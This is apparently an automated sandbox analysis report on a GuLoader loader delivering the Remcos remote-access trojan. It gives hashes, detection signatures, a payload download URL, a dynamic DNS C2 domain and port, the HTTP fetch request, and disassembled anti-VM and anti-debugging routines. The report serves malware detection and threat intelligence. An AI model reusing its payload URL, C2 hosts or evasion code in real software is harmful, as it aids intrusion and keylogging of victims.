Windows Analysis Report LzbZ4T1iV8.exe

Overview

General Information

Sample Name: LzbZ4T1iV8.exe
Analysis ID: 458125
MD5: 41e1bc9de5f3b61639fb88143e933ff8
SHA1: 432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256: d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
Tags: exe

Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}
Multi AV Scanner detection for submitted file
Source: LzbZ4T1iV8.exe Virustotal: Detection: 17%
Source: LzbZ4T1iV8.exe ReversingLabs: Detection: 17%
Yara detected Remcos RAT
Source: Yara match File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
Machine Learning detection for sample
Source: LzbZ4T1iV8.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: LzbZ4T1iV8.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin^
Uses dynamic DNS services
Source: unknown DNS query: name: wealthyrem.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49767 -> 194.5.97.128:39200
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE
Source: Joe Sandbox View ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown DNS traffic detected: queries for: wealthyrem.ddns.net
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\LzbZ4T1iV8.exe

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F588C NtAllocateVirtualMemory, 1_2_020F588C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F03CA NtWriteVirtualMemory, 1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F8FC4 NtProtectVirtualMemory, 1_2_020F8FC4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA, 1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F93EC NtResumeThread, 1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F4C19 NtWriteVirtualMemory, 1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F7EA4 NtWriteVirtualMemory, 1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F42C4 NtWriteVirtualMemory, 1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F58FA NtAllocateVirtualMemory, 1_2_020F58FA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F474F NtWriteVirtualMemory, 1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F43A8 NtWriteVirtualMemory, 1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F61C5 NtWriteVirtualMemory, 1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F93FB NtResumeThread, 1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 13_2_00569B42 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 13_2_00569B42
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 13_2_00569C0E LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 13_2_00569C0E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 13_2_00569B3D TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory, 13_2_00569B3D
Detected potential crypto function
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_00404478 1_2_00404478
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_00404418 1_2_00404418
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_00404834 1_2_00404834
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_004036F0 1_2_004036F0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_004034F4 1_2_004034F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_00403488 1_2_00403488
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_004046B4 1_2_004046B4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_00404774 1_2_00404774
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_00404534 1_2_00404534
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_004045F4 1_2_004045F4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_004035B2 1_2_004035B2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_004043B8 1_2_004043B8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F8680 1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0567 1_2_020F0567
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F03CA 1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0BEF 1_2_020F0BEF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F93EC 1_2_020F93EC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F4C19 1_2_020F4C19
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F424C 1_2_020F424C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F8A4B 1_2_020F8A4B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F3C48 1_2_020F3C48
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0E55 1_2_020F0E55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F8C67 1_2_020F8C67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F9E67 1_2_020F9E67
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F1060 1_2_020F1060
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0E7A 1_2_020F0E7A
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F1070 1_2_020F1070
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0C8E 1_2_020F0C8E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F808E 1_2_020F808E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F249F 1_2_020F249F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F2899 1_2_020F2899
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F7EA4 1_2_020F7EA4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F56A3 1_2_020F56A3
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F2EA2 1_2_020F2EA2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F14C6 1_2_020F14C6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F42C4 1_2_020F42C4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F20C0 1_2_020F20C0
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F7AD9 1_2_020F7AD9
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F10EB 1_2_020F10EB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F7EE6 1_2_020F7EE6
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F20FE 1_2_020F20FE
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F2CF2 1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F3912 1_2_020F3912
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F5D10 1_2_020F5D10
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F7F34 1_2_020F7F34
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F474F 1_2_020F474F
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F154C 1_2_020F154C
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F5D5D 1_2_020F5D5D
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0B55 1_2_020F0B55
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F1D68 1_2_020F1D68
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F1D73 1_2_020F1D73
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F43A8 1_2_020F43A8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F3FBC 1_2_020F3FBC
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F61C5 1_2_020F61C5
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F37D8 1_2_020F37D8
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0BD2 1_2_020F0BD2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F77FF 1_2_020F77FF
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F89FD 1_2_020F89FD
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F93FB 1_2_020F93FB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F87FA 1_2_020F87FA
PE file contains strange resources
Source: LzbZ4T1iV8.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LzbZ4T1iV8.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: LzbZ4T1iV8.exe, 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1721652241.000000001DD60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe, 0000000D.00000000.861623499.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Source: LzbZ4T1iV8.exe Binary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
Uses 32bit PE files
Source: LzbZ4T1iV8.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe File created: C:\Users\user\AppData\Roaming\remcos
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe File created: C:\Users\user\AppData\Local\Temp\~DF7C81C95CE370506E.TMP
Source: LzbZ4T1iV8.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: LzbZ4T1iV8.exe Virustotal: Detection: 17%
Source: LzbZ4T1iV8.exe ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_004018D2 push fs; retf 1_2_004018D4
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F662F push cs; iretd 1_2_020F6630
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F003D push esp; iretd 1_2_020F003E
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F00AA push esp; iretd 1_2_020F00AB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 13_2_0056A006 pushfd ; iretd 13_2_0056A007
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 13_2_00569F30 pushfd ; retf 13_2_00569F43
Source: initial sample Static PE information: section name: .text entropy: 7.08169017725
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F03CA NtWriteVirtualMemory, 1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA, 1_2_020F0BEF
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://101.99.94.119/WEALTH_PRUUQVZW139.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F74C3 second address: 00000000020F7542 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push D90E6CFBh 0x00000010 call 00007F7AFC9FAF32h 0x00000015 mov dword ptr [ebp+04h], eax 0x00000018 mov ebx, dword ptr [eax+3Ch] 0x0000001b add eax, ebx 0x0000001d mov ebx, dword ptr [eax+78h] 0x00000020 mov eax, dword ptr [ebp+04h] 0x00000023 add eax, ebx 0x00000025 mov ecx, dword ptr [eax+18h] 0x00000028 mov dword ptr [ebp+08h], ecx 0x0000002b mov ecx, dword ptr [eax+1Ch] 0x0000002e mov dword ptr [ebp+14h], ecx 0x00000031 mov ecx, dword ptr [eax+24h] 0x00000034 mov dword ptr [ebp+10h], ecx 0x00000037 mov esi, dword ptr [eax+20h] 0x0000003a add esi, dword ptr [ebp+04h] 0x0000003d xor ecx, ecx 0x0000003f mov edx, dword ptr [esi] 0x00000041 add edx, dword ptr [ebp+04h] 0x00000044 mov dword ptr [ebp+000001F3h], eax 0x0000004a test si, 2E1Ah 0x0000004f mov eax, ecx 0x00000051 push eax 0x00000052 mov eax, dword ptr [ebp+000001F3h] 0x00000058 mov dword ptr [ebp+000001C8h], ebx 0x0000005e mov ebx, esi 0x00000060 push ebx 0x00000061 pushad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F734C second address: 00000000020F734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC9FAEFEh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F8236 second address: 00000000020F8261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC461375h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F7D0C second address: 00000000020F7D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC9FAF1Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC9FAFF9h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC9FAEFAh 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC9FAF5Ch 0x00000062 call 00007F7AFC9FAF3Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC9FAFF9h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F7E99 second address: 00000000020F7E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC461A6Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC461551h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 000000000056734C second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC46130Eh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 0000000000568236 second address: 0000000000568261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC9FAF65h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 0000000000567D0C second address: 0000000000567D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC46132Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC461409h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC46130Ah 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC46136Ch 0x00000062 call 00007F7AFC46134Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC461409h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 0000000000567E99 second address: 0000000000567E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC9FB65Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC9FB141h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe RDTSC instruction interceptor: First address: 0000000000562D9E second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ebx 0x00000004 cmp bx, cx 0x00000007 mov ebx, dword ptr [ebp+000001E5h] 0x0000000d mov dword ptr [ebp+0000023Eh], edi 0x00000013 mov edi, ebx 0x00000015 push edi 0x00000016 mov edi, dword ptr [ebp+0000023Eh] 0x0000001c test cx, ax 0x0000001f mov dword ptr [ebp+00000277h], ecx 0x00000025 mov ecx, edi 0x00000027 push ecx 0x00000028 cmp bx, cx 0x0000002b mov ecx, dword ptr [ebp+00000277h] 0x00000031 call 00007F7AFC465881h 0x00000036 mov ecx, dword ptr [esp+0Ch] 0x0000003a mov edx, dword ptr [esp+08h] 0x0000003e mov ebx, dword ptr [esp+04h] 0x00000042 test ecx, ecx 0x00000044 je 00007F7AFC461338h 0x00000046 test eax, ecx 0x00000048 mov al, byte ptr [edx] 0x0000004a mov byte ptr [ebx], al 0x0000004c pushad 0x0000004d mov ecx, 00000009h 0x00000052 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F8680 rdtsc 1_2_020F8680
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Window / User API: threadDelayed 9146
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Window / User API: foregroundWindowGot 461
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408 Thread sleep count: 9146 > 30
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408 Thread sleep time: -45730s >= -30000s
Sleep loop found (likely to delay execution)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Thread sleep count: Count: 9146 delay: -5
